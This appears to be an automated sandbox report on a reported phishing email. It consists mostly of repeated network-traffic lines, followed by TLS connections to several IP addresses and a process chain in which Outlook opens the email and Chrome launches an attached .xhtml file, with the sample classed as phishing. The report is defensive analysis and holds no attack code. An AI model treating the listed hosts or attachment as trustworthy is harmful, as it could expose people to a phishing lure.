      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.17:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.17:49785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.17:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49827 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.17:49839 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.17:49836 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.17:49835 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.17:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.17:49846 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49869 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir4784_554478248
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir4784_554478248
      Source: classification engineClassification label: mal60.phis.winEML@22/14@14/151
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250326T1513590802-6960.etl
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_sp2_2.0.0.0.eml"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "93F44844-EB21-4753-9204-F187D6997DD0" "05C9278A-EE27-4255-AC20-615C478E8326" "6960" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "93F44844-EB21-4753-9204-F187D6997DD0" "05C9278A-EE27-4255-AC20-615C478E8326" "6960" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\GOGNBZ4K\Play_VM-NowVWAV.xhtml
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,740971170402014569,13365683577159135004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\GOGNBZ4K\Play_VM-NowVWAV.xhtml
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
